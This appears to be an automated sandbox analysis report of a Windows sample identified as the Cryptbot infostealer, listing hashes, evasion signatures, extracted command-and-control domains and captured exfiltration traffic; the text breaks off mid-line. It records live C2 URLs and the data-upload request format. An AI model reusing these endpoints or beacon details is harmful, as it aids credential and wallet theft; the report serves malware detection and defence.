Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
random(5).exe

Overview

General Information

Sample name:random(5).exe
Analysis ID:1583231
MD5:f200a3445a8034d201eeb79bb29e1d73
SHA1:473cd32eb4bc8ff05c3e608b86ba651fc4d7b0e1
SHA256:ee6c112a14a1e5a9429b47f5b810f61a58e77860eea867e064d2ab40582757cc
Tags:exelev-tolstoi-comuser-JAMESWT_MHT
Infos:

Detection

Cryptbot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Cryptbot
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • random(5).exe (PID: 5792 cmdline: "C:\Users\user\Desktop\random(5).exe" MD5: F200A3445A8034D201EEB79BB29E1D73)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CryptBotA typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot
{"C2 list": ["KvgPhome.fortth14vs.top", ".for8014vs.top", "home.fortth14vs.top", ".1.1home.fortth14vs.top", ".forth14vs.top", "fortth14vsh14vs.top"]}
SourceRuleDescriptionAuthorStrings
Process Memory Space: random(5).exe PID: 5792JoeSecurity_Cryptbot_1Yara detected CryptbotJoe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: random(5).exeAvira: detected
    Source: KvgPhome.fortth14vs.topAvira URL Cloud: Label: malware
    Source: http://home.fortth14vs.top/gduZ0Avira URL Cloud: Label: malware
    Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0UAvira URL Cloud: Label: malware
    Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18Avira URL Cloud: Label: malware
    Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb17355377386963Avira URL Cloud: Label: malware
    Source: .1.1home.fortth14vs.topAvira URL Cloud: Label: malware
    Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0Avira URL Cloud: Label: malware
    Source: home.fortth14vs.topAvira URL Cloud: Label: malware
    Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMahAvira URL Cloud: Label: malware
    Source: http://home.fortth14vs.top/gduZAvira URL Cloud: Label: malware
    Source: http://home.fortth14vs.top/gduZTAvira URL Cloud: Label: malware
    Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738lseAvira URL Cloud: Label: malware
    Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738Avira URL Cloud: Label: malware
    Source: random(5).exe.5792.0.memstrminMalware Configuration Extractor: Cryptbot {"C2 list": ["KvgPhome.fortth14vs.top", ".for8014vs.top", "home.fortth14vs.top", ".1.1home.fortth14vs.top", ".forth14vs.top", "fortth14vsh14vs.top"]}
    Source: random(5).exeVirustotal: Detection: 48%Perma Link
    Source: random(5).exeReversingLabs: Detection: 44%
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Source: random(5).exeJoe Sandbox ML: detected
    Source: C:\Users\user\Desktop\random(5).exeCode function: -----BEGIN PUBLIC KEY-----0_2_00E5DCF0
    Source: random(5).exeBinary or memory string: -----BEGIN PUBLIC KEY-----
    Source: C:\Users\user\Desktop\random(5).exeCode function: mov dword ptr [ebp+04h], 424D53FFh0_2_00E9A5B0
    Source: C:\Users\user\Desktop\random(5).exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_00E9A7F0
    Source: C:\Users\user\Desktop\random(5).exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_00E9A7F0
    Source: C:\Users\user\Desktop\random(5).exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_00E9A7F0
    Source: C:\Users\user\Desktop\random(5).exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_00E9A7F0
    Source: C:\Users\user\Desktop\random(5).exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_00E9A7F0
    Source: C:\Users\user\Desktop\random(5).exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_00E9A7F0
    Source: C:\Users\user\Desktop\random(5).exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_00E9B560
    Source: random(5).exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_00E3255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00E3255D
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_00E329FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_00E329FF

    Networking

    barindex
    Source: Malware configuration extractorURLs: KvgPhome.fortth14vs.top
    Source: Malware configuration extractorURLs: .for8014vs.top
    Source: Malware configuration extractorURLs: home.fortth14vs.top
    Source: Malware configuration extractorURLs: .1.1home.fortth14vs.top
    Source: Malware configuration extractorURLs: .forth14vs.top
    Source: Malware configuration extractorURLs: fortth14vsh14vs.top
    Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
    Source: global trafficHTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1Host: home.fortth14vs.topAccept: */*Content-Type: application/jsonContent-Length: 442005Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 35 32 31 33 32 31 34 30 30 30 31 36 37 36 30 34 33 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c
    Source: global trafficHTTP traffic detected: GET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1Host: home.fortth14vs.topAccept: */*
    Source: global trafficHTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1Host: home.fortth14vs.topAccept: */*Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
    Source: Joe Sandbox ViewIP Address: 34.147.147.173 34.147.147.173
    Source: Joe Sandbox ViewIP Address: 34.200.57.114 34.200.57.114
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: C:\Users\user\Desktop\random(5).exeCode function: 0_2_00EFA8C0 recvfrom,0_2_00EFA8C0
    Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
    Source: global trafficHTTP traffic detected: GET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1Host: home.fortth14vs.topAccept: */*
    Source: global trafficDNS traffic detected: DNS query: httpbin.org
    Source: global trafficDNS traffic detected: DNS query: home.fortth14vs.top
    Source: unknownHTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1Host: home.fortth14vs.topAccept: */*Content-Type: application/jsonContent-Length: 442005Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 35 32 31 33 32 31 34 30 30 30 31 36 37 36 30 34 33 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDserver: nginx/1.22.1date: Thu, 02 Jan 2025 08:15:13 GMTcontent-type: text/html; charset=utf-8content-length: 207Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDserver: nginx/1.22.1date: Thu, 02 Jan 2025 08:15:14 GMTcontent-type: text/html; charset=utf-8content-length: 207Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
    Source: random(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
    Source: random(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
    Source: random(5).exe, random(5).exe, 00000000.00000003.2251332310.000000000086B000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000003.2251291489.0000000000843000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258581917.000000000086C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZ
    Source: random(5).exe, 00000000.00000003.2251332310.000000000086B000.00000004.00000020.00020000.00